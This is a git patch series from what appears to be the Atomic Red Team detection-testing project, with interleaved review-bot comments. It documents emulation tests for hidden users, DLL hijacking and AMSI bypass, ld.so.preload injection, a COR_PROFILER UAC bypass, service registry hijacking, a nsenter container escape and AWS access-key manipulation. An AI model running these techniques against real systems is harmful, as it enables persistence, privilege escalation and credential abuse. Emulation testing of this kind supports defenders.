## Atomic Test #4 - Create ADS PowerShell - -auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 - Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + + + #### Inputs: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 4bdd4e75..08e4f131 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,9 +16,6 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA - -auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a - This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -30,9 +27,14 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + + + @@ -76,13 +78,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" - -auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - Creating a user with a username containing "$" + **Supported Platforms:** Windows +**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778 + + + @@ -106,13 +110,15 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) - -auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c - Creating a user with a username containing with a space on the end + **Supported Platforms:** Windows +**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c + + + diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 7a3de378..da4434af 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,15 +14,17 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript - -auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 - The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306 + + + @@ -53,14 +55,16 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line - -auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f - Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 + **Supported Platforms:** Windows +**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f + + + #### Inputs: diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 1c14ffe9..a4b90c7a 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,13 +14,15 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl - -auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 - Utilize launchctl + **Supported Platforms:** macOS +**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2 + + + #### Inputs: diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index 6015e492..7ecc1ec7 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,15 +16,17 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service - -auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 - Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` + **Supported Platforms:** Windows +**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + + + #### Inputs: @@ -56,16 +58,18 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host - -auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c - Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). + **Supported Platforms:** Windows +**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c + + + #### Inputs: diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index a9aae7f5..3549804a 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,14 +12,16 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell - -auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 - Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4 + + + #### Inputs: @@ -45,13 +47,15 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port - -auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 - Testing uncommonly used port utilizing telnet. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767 + + + #### Inputs: diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ef035415..ce3ca961 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,18 +10,20 @@
## Atomic Test #1 - OpenSSL C2 - -auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 - Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. + **Supported Platforms:** Windows +**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003 + + + #### Inputs: diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index dcc50b0e..10700bb9 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,16 +16,18 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll - -auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + + + diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 10229d09..74667b1d 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,14 +12,16 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary - -auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040 + + + #### Inputs: diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index ec61d98f..45fef5aa 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,15 +18,17 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload - -auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + **Supported Platforms:** Linux +**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + + + #### Inputs: @@ -68,15 +70,17 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
## Atomic Test #2 - Shared Library Injection via LD_PRELOAD - -auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + **Supported Platforms:** Linux +**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae + + + #### Inputs: diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index ffc87c80..b32b1035 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,15 +14,17 @@ This technique can be used for persistence if executables are called on a regula
## Atomic Test #1 - Execution of program.exe as service with unquoted service path - -auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f + + + #### Inputs: diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 18600716..821ed917 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,14 +16,16 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness - -auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + **Supported Platforms:** Windows +**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a + + + #### Inputs: @@ -49,13 +51,15 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe - -auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - Change Service registry ImagePath of a bengin service to a malicious file + **Supported Platforms:** Windows +**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827 + + + #### Inputs: diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index 958aac95..693d673f 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,9 +18,6 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
## Atomic Test #1 - User scope COR_PROFILER - -auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -28,9 +25,14 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + + + #### Inputs: @@ -82,18 +84,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER - -auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310 + + + #### Inputs: @@ -141,15 +145,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER - -auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817 + + + #### Inputs: diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 292c6f39..e3aaf7bd 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,13 +12,15 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer - -auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b - Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b + + + #### Inputs: diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index c1e1dbd6..6b91bb16 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,17 +12,19 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b + + + diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index b39e3b53..910e11e7 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,17 +12,19 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff + + + From fd47161006eee73b96372ad488b2a58bd06c923e Mon Sep 17 00:00:00 2001 From: Bhavin Patel Date: Thu, 24 Jun 2021 15:44:35 -0500 Subject: [PATCH 69/84] AWS Cloud atomics (#1457) * cloud atomics * adding new platform names * text and variable updates * minor * Update T1136.003.yaml Co-authored-by: bpatel Co-authored-by: Jose Enrique Hernandez Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- .gitignore | 3 +++ atomics/T1098.001/T1098.001.yaml | 31 +++++++++++++++++++++++++++++ atomics/T1098.001/bin/aws_secret.sh | 11 ++++++++++ atomics/T1098/T1098.yaml | 28 ++++++++++++++++++++++++++ atomics/T1136.003/T1136.003.yaml | 27 +++++++++++++++++++++++++ 5 files changed, 100 insertions(+) create mode 100644 atomics/T1098.001/T1098.001.yaml create mode 100755 atomics/T1098.001/bin/aws_secret.sh create mode 100644 atomics/T1136.003/T1136.003.yaml diff --git a/.gitignore b/.gitignore index f2f8d099..652699ed 100644 --- a/.gitignore +++ b/.gitignore @@ -24,3 +24,6 @@ docs/.sass-cache/ docs/_site/ **/Invoke-AtomicTest-ExecutionLog.csv techniques_hash.db + +# Credential files +*.creds \ No newline at end of file 
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml new file mode 100644 index 00000000..6435b055 --- /dev/null +++ b/atomics/T1098.001/T1098.001.yaml @@ -0,0 +1,31 @@ +attack_technique: T1098.001 +display_name: 'Account Manipulation: Additional Cloud Credentials' +atomic_tests: +- name: AWS - Create Access Key and Secret Key + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 + description: | + Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Create new AWS access and secret keys for the user + type: String + default: "atomicredteam" + dependencies: + - description: | + Check if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic + executor: + command: | + aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + cd $PathToAtomicsFolder/T1098.001/bin/ + ./aws_secret.sh + cleanup_command: | + access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` + aws iam delete-access-key --access-key-id $access_key --user-name #{username} + rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + name: sh \ No newline at end of file diff --git a/atomics/T1098.001/bin/aws_secret.sh b/atomics/T1098.001/bin/aws_secret.sh new file mode 100755 index 00000000..f96e740b --- /dev/null +++ b/atomics/T1098.001/bin/aws_secret.sh 
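Review bot: The executor's first command redirects the CreateAccessKey response — a live secret access key — into `aws_secret.creds` under whatever umask the runner has, so on a shared host the file is readable by other local users until cleanup removes it; wrap it as `( umask 077; aws iam create-access-key --user-name #{username} > "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds" )` so only the invoking user can read it. The `auto_generated_guid` value `8822c3b0-d9f9-4daf-a043-491160a31122` looks hand-edited rather than generated: it shares its first 20 hex digits with the existing T1564.004 GUID `8822c3b0-d9f9-4daf-a043-49f4602364f4` further up this page, and the T1098.yaml hunk below has the same pattern; since the repository has a CI job that assigns GUIDs (PATCH 70/84 on this page), omit the line in both and let it be generated. The prereq `aws iam list-users | grep #{username}` is a substring match, so a user such as `atomicredteam2` would satisfy it; `aws iam get-user --user-name #{username}` checks the exact name. `elevation_required` is unset here while the T1136.003 hunk sets it to `false`; make the three new tests consistent.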
@@ -0,0 +1,11 @@ +#! /bin/sh +echo "Creating Profile in ./aws/credentials" +access_key=`cat aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` +secret_key=`cat aws_secret.creds| jq -r '.AccessKey.SecretAccessKey'` +line=`grep -n atomicredteam ~/.aws/credentials | cut -d : -f1 |bc` +access="$(($line+1))" +secret="$(($line+2))" +sed -i '' "${access}s|aws_access_key_id = .*$|aws_access_key_id = $access_key|g" ~/.aws/credentials +sed -i '' "${secret}s|aws_secret_access_key = .*$|aws_secret_access_key = $secret_key|g" ~/.aws/credentials + + diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index e1093c43..8d72ceb3 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -101,3 +101,31 @@ atomic_tests: Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False name: powershell +- name: AWS - Create a group and add a user to that group + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 + description: | + Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Name of the AWS group to create + type: String + default: "atomicredteam" + dependencies: + - description: | + Check if the user exists, we can only add a user to a group if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic test + executor: + command: | + aws iam create-group --group-name #{username} + aws iam add-user-to-group --user-name #{username} --group-name #{username} + cleanup_command: | + aws iam remove-user-from-group --user-name #{username} --group-name #{username} + aws iam delete-group --group-name #{username} + name: sh + + diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml new file mode 100644 index 00000000..4b3394b3 
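Review bot: `line` from `grep -n atomicredteam ~/.aws/credentials | cut -d : -f1 |bc` is never checked, so when no `atomicredteam` stanza exists it is empty, `$(($line+1))` evaluates to 1, `access`/`secret` become 1 and 2, and the two `sed` calls then rewrite whichever `aws_access_key_id`/`aws_secret_access_key` lines sit at the top of the file — typically the `[default]` profile — with a key belonging to a different user. Add a guard before the arithmetic: `[ -n "$line" ] || { echo "profile atomicredteam not found in ~/.aws/credentials" >&2; exit 1; }`. The profile name is hard-coded here while the YAML passes `#{username}`; taking it as `$1` would keep the two in step. `sed -i ''` is BSD/macOS syntax — GNU sed reads the empty string as the script and the `"${access}s|...|g"` expression as a filename — so as written the script fails on Linux hosts even though the executor is `sh`. The `echo` also names `./aws/credentials` while the file edited is `~/.aws/credentials`.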
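Review bot: The `username` argument's description `Name of the AWS group to create` does not match how the argument is used — `#{username}` is passed as both `--user-name` and `--group-name` on the `create-group` and `add-user-to-group` lines — so it should say that one value names the existing user and the new group, e.g. `Name of the existing IAM user; also used as the name of the group that is created`. The test description talks about elevating privileges, but the executor only creates an empty group and adds the user to it (no policy is attached), so the wording overstates what runs; `Creates an IAM group and adds the user to it, the first step an adversary would take before granting that group additional permissions` describes the hunk accurately and fixes `privilieges`/`accesss`. The `auto_generated_guid` `8822c3b0-d9f9-4daf-a043-49f110a31122` differs from the T1098.001 test's GUID by two characters, which suggests it was hand-edited rather than generated; since the GUID generator in this series fills the field in, leaving it out is safer. Like the T1098.001 hunk, this entry omits `elevation_required`, which T1136.003 in the same commit sets explicitly.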
--- /dev/null
+++ b/atomics/T1136.003/T1136.003.yaml
@@ -0,0 +1,27 @@
+attack_technique: T1136.003
+display_name: 'Create Account: Cloud Account'
+atomic_tests:
+- name: AWS - Create a new IAM user
+ description: |
+ Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ username:
+ description: Username of the IAM user to create in AWS
+ type: String
+ default: "atomicredteam"
+ dependencies:
+ - description: |
+ Check if ~/.aws/credentials file has a default stanza is configured
+ prereq_command: |
+ cat ~/.aws/credentials | grep "default"
+ get_prereq_command: |
+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+ executor:
+ command: |
+ aws iam create-user --user-name #{username}
+ cleanup_command: |
+ aws iam delete-user --user-name #{username}
+ name: sh
+ elevation_required: false
From c77595d359bfde2a6bd7a15d78f065ba3b2676e4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 24 Jun 2021 20:45:04 +0000 Subject: [PATCH 70/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1136.003/T1136.003.yaml | 1 + atomics/used_guids.txt | 3 +++ 2 files changed, 4 insertions(+)
diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml
index 4b3394b3..4083c296 100644
--- a/atomics/T1136.003/T1136.003.yaml
+++ b/atomics/T1136.003/T1136.003.yaml
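Review bot: The `cleanup_command` `aws iam delete-user --user-name #{username}` is rejected by IAM while the user still owns access keys or group memberships, and the T1098.001 and T1098 tests added in this same commit create exactly those for the same default user, so running the cleanups in test order leaves the user behind. Either the description should state that the T1098.001 and T1098 cleanups must run first, or this cleanup should list and remove the user's access keys and group memberships before `delete-user`. The dependency check `cat ~/.aws/credentials | grep "default"` only proves the word appears in the file, not that the CLI can authenticate; `aws sts get-caller-identity` is the usual liveness check for a configured profile. Two typos: `defult` in `get_prereq_command` and `interupt` in the description, and the sentence `Upon successful creation, a new user will be created.` restates itself and can be dropped.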
@@ -2,6 +2,7 @@ attack_technique: T1136.003 display_name: 'Create Account: Cloud Account' atomic_tests: - name: AWS - Create a new IAM user + auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad description: | Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index d6e53f28..0c7557d9 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -722,3 +722,6 @@ d546a3d9-0be5-40c7-ad82-5a7d79e1b66b afedc8c4-038c-4d82-b3e5-623a95f8a612 c99a829f-0bb8-4187-b2c6-d47d1df74cab b4988cad-6ed2-434d-ace5-ea2670782129 +8822c3b0-d9f9-4daf-a043-491160a31122 +8822c3b0-d9f9-4daf-a043-49f110a31122 +8d1c2368-b503-40c9-9057-8e42f21c58ad From ca1e5786ed14df5fe7de858cad321d5e918e2cc5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 20:45:11 +0000 Subject: [PATCH 71/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/linux-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 7 +- .../Indexes/Indexes-Markdown/linux-index.md | 9 +- atomics/Indexes/Matrices/linux-matrix.md | 6 +- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/index.yaml | 108 +++++++++++++++++- atomics/T1098.001/T1098.001.md | 66 +++++++++++ atomics/T1098/T1098.md | 53 +++++++++ atomics/T1136.003/T1136.003.md | 60 ++++++++++ 12 files changed, 309 insertions(+), 14 deletions(-) create mode 100644 atomics/T1098.001/T1098.001.md create mode 100644 atomics/T1136.003/T1136.003.md 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 5358846e..cc0218bb 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"technique
